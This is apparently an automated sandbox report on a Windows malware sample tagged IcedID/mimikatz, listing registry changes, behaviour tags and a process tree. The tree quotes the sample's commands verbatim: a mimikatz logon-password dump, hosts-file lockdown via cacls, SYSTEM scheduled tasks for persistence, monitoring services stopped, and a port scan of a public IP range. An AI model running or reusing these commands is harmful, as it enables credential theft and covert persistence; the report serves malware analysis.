\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vvwuinghb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nsgwibn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-10-17_04852ff736e1a732385f302776eba267_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nsgwibn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4460 cmd.exe 312 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x0009000000023bfa-6.dat nsis_installer_2 behavioral2/files/0x0011000000023c61-15.dat nsis_installer_1 behavioral2/files/0x0011000000023c61-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 45 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ nsgwibn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" nsgwibn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" nsgwibn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing nsgwibn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" nsgwibn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software yumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals yumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing yumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" nsgwibn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yumgbbwyg.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ nsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" nsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ nsgwibn.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 312 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4448 schtasks.exe 388 schtasks.exe 4380 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 3232 2024-10-17_04852ff736e1a732385f302776eba267_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 3232 2024-10-17_04852ff736e1a732385f302776eba267_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 400 nsgwibn.exe Token: SeDebugPrivilege 1212 nsgwibn.exe Token: SeDebugPrivilege 4296 vfshost.exe Token: SeDebugPrivilege 5032 yumgbbwyg.exe Token: SeLockMemoryPrivilege 936 ierigg.exe Token: SeLockMemoryPrivilege 936 ierigg.exe Token: SeDebugPrivilege 2088 yumgbbwyg.exe Token: SeDebugPrivilege 3252 yumgbbwyg.exe Token: SeDebugPrivilege 4384 yumgbbwyg.exe Token: SeDebugPrivilege 3708 yumgbbwyg.exe Token: SeDebugPrivilege 2280 yumgbbwyg.exe Token: SeDebugPrivilege 3656 yumgbbwyg.exe Token: SeDebugPrivilege 2396 yumgbbwyg.exe Token: SeDebugPrivilege 2768 yumgbbwyg.exe Token: SeDebugPrivilege 3616 yumgbbwyg.exe Token: SeDebugPrivilege 720 yumgbbwyg.exe Token: SeDebugPrivilege 3284 yumgbbwyg.exe Token: SeDebugPrivilege 2232 yumgbbwyg.exe Token: SeDebugPrivilege 3456 yumgbbwyg.exe Token: SeDebugPrivilege 4824 yumgbbwyg.exe Token: SeDebugPrivilege 4548 yumgbbwyg.exe Token: SeDebugPrivilege 3060 yumgbbwyg.exe Token: SeDebugPrivilege 3656 yumgbbwyg.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 3232 2024-10-17_04852ff736e1a732385f302776eba267_hacktools_icedid_mimikatz.exe 3232 2024-10-17_04852ff736e1a732385f302776eba267_hacktools_icedid_mimikatz.exe 400 nsgwibn.exe 400 nsgwibn.exe 1212 nsgwibn.exe 1212 nsgwibn.exe 5000 xohudmc.exe 5100 kcuyyg.exe 3236 nsgwibn.exe 3236 nsgwibn.exe 4464 nsgwibn.exe 4464 nsgwibn.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3232 wrote to memory of 4460 3232 2024-10-17_04852ff736e1a732385f302776eba267_hacktools_icedid_mimikatz.exe 84 PID 3232 wrote to memory of 4460 3232 2024-10-17_04852ff736e1a732385f302776eba267_hacktools_icedid_mimikatz.exe 84 PID 3232 wrote to memory of 4460 3232 2024-10-17_04852ff736e1a732385f302776eba267_hacktools_icedid_mimikatz.exe 84 PID 4460 wrote to memory of 312 4460 cmd.exe 87 PID 4460 wrote to memory of 312 4460 cmd.exe 87 PID 4460 wrote to memory of 312 4460 cmd.exe 87 PID 4460 wrote to memory of 400 4460 cmd.exe 90 PID 4460 wrote to memory of 400 4460 cmd.exe 90 PID 4460 wrote to memory of 400 4460 cmd.exe 90 PID 1212 wrote to memory of 3944 1212 nsgwibn.exe 94 PID 1212 wrote to memory of 3944 1212 nsgwibn.exe 94 PID 1212 wrote to memory of 3944 1212 nsgwibn.exe 94 PID 3944 wrote to memory of 4788 3944 cmd.exe 96 PID 3944 wrote to memory of 4788 3944 cmd.exe 96 PID 3944 wrote to memory of 4788 3944 cmd.exe 96 PID 3944 wrote to memory of 5044 3944 cmd.exe 97 PID 3944 wrote to memory of 5044 3944 cmd.exe 97 PID 3944 wrote to memory of 5044 3944 cmd.exe 97 PID 3944 wrote to memory of 2028 3944 cmd.exe 98 PID 3944 wrote to memory of 2028 3944 cmd.exe 98 PID 3944 wrote to memory of 2028 3944 cmd.exe 98 PID 3944 wrote to memory of 1240 3944 cmd.exe 99 PID 3944 wrote to memory of 1240 3944 cmd.exe 99 PID 3944 wrote to memory of 1240 3944 cmd.exe 99 PID 3944 wrote to memory of 3200 3944 cmd.exe 100 PID 3944 wrote to memory of 3200 3944 cmd.exe 100 PID 3944 wrote to memory of 3200 3944 cmd.exe 100 PID 3944 wrote to memory of 2244 3944 cmd.exe 101 PID 3944 wrote to memory of 2244 3944 cmd.exe 101 PID 3944 wrote to memory of 2244 3944 cmd.exe 101 PID 1212 wrote to memory of 1512 1212 nsgwibn.exe 105 PID 1212 wrote to memory of 1512 1212 nsgwibn.exe 105 PID 1212 wrote to memory of 1512 1212 nsgwibn.exe 105 PID 1212 wrote to memory of 3360 1212 nsgwibn.exe 107 PID 1212 wrote to memory of 3360 1212 nsgwibn.exe 107 PID 1212 wrote to memory of 3360 1212 nsgwibn.exe 107 PID 1212 wrote to memory of 1984 1212 nsgwibn.exe 109 PID 1212 wrote to memory of 1984 1212 nsgwibn.exe 109 PID 1212 wrote to memory of 1984 1212 nsgwibn.exe 109 PID 1212 wrote to memory of 3836 1212 nsgwibn.exe 113 PID 1212 wrote to memory of 3836 1212 nsgwibn.exe 113 PID 1212 wrote to memory of 3836 1212 nsgwibn.exe 113 PID 3836 wrote to memory of 2832 3836 cmd.exe 115 PID 3836 wrote to memory of 2832 3836 cmd.exe 115 PID 3836 wrote to memory of 2832 3836 cmd.exe 115 PID 2832 wrote to memory of 4308 2832 wpcap.exe 116 PID 2832 wrote to memory of 4308 2832 wpcap.exe 116 PID 2832 wrote to memory of 4308 2832 wpcap.exe 116 PID 4308 wrote to memory of 3132 4308 net.exe 118 PID 4308 wrote to memory of 3132 4308 net.exe 118 PID 4308 wrote to memory of 3132 4308 net.exe 118 PID 2832 wrote to memory of 3232 2832 wpcap.exe 119 PID 2832 wrote to memory of 3232 2832 wpcap.exe 119 PID 2832 wrote to memory of 3232 2832 wpcap.exe 119 PID 3232 wrote to memory of 4232 3232 net.exe 121 PID 3232 wrote to memory of 4232 3232 net.exe 121 PID 3232 wrote to memory of 4232 3232 net.exe 121 PID 2832 wrote to memory of 1740 2832 wpcap.exe 122 PID 2832 wrote to memory of 1740 2832 wpcap.exe 122 PID 2832 wrote to memory of 1740 2832 wpcap.exe 122 PID 1740 wrote to memory of 756 1740 net.exe 124 PID 1740 wrote to memory of 756 1740 net.exe 124 PID 1740 wrote to memory of 756 1740 net.exe 124 PID 2832 wrote to memory of 804 2832 wpcap.exe 125
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2116
-
C:\Windows\TEMP\ybymbrggy\ierigg.exe"C:\Windows\TEMP\ybymbrggy\ierigg.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:936
-
-
C:\Users\Admin\AppData\Local\Temp\2024-10-17_04852ff736e1a732385f302776eba267_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-10-17_04852ff736e1a732385f302776eba267_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3232 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\guiyywyg\nsgwibn.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4460 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:312
-
-
C:\Windows\guiyywyg\nsgwibn.exeC:\Windows\guiyywyg\nsgwibn.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:400
-
-
-
C:\Windows\guiyywyg\nsgwibn.exeC:\Windows\guiyywyg\nsgwibn.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1212 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3944 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4788
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:5044
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2028
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:1240
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3200
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:2244
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1512
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3360
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1984
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\iguwtuflb\umnwwtqyn\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3836 -
C:\Windows\iguwtuflb\umnwwtqyn\wpcap.exeC:\Windows\iguwtuflb\umnwwtqyn\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2832 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4308 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:3132
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3232 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:4232
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1740 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:756
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:804 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:964
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:4460
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:432 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:4788
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:4372 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:848 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:3292
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\iguwtuflb\umnwwtqyn\kzurgcimy.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\iguwtuflb\umnwwtqyn\Scant.txt2⤵PID:4800
-
C:\Windows\iguwtuflb\umnwwtqyn\kzurgcimy.exeC:\Windows\iguwtuflb\umnwwtqyn\kzurgcimy.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\iguwtuflb\umnwwtqyn\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:8
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\iguwtuflb\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\iguwtuflb\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:4780 -
C:\Windows\iguwtuflb\Corporate\vfshost.exeC:\Windows\iguwtuflb\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4296
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "mnibimvud" /ru system /tr "cmd /c C:\Windows\ime\nsgwibn.exe"2⤵
- System Location Discovery: System Language Discovery
PID:2732 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2440
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "mnibimvud" /ru system /tr "cmd /c C:\Windows\ime\nsgwibn.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:4380
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ybtigywbq" /ru system /tr "cmd /c echo Y|cacls C:\Windows\guiyywyg\nsgwibn.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:1792 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1244
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "ybtigywbq" /ru system /tr "cmd /c echo Y|cacls C:\Windows\guiyywyg\nsgwibn.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4448
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tsblrgybd" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ybymbrggy\ierigg.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:3644 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4320
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "tsblrgybd" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ybymbrggy\ierigg.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:388
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3356
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3708
-
-
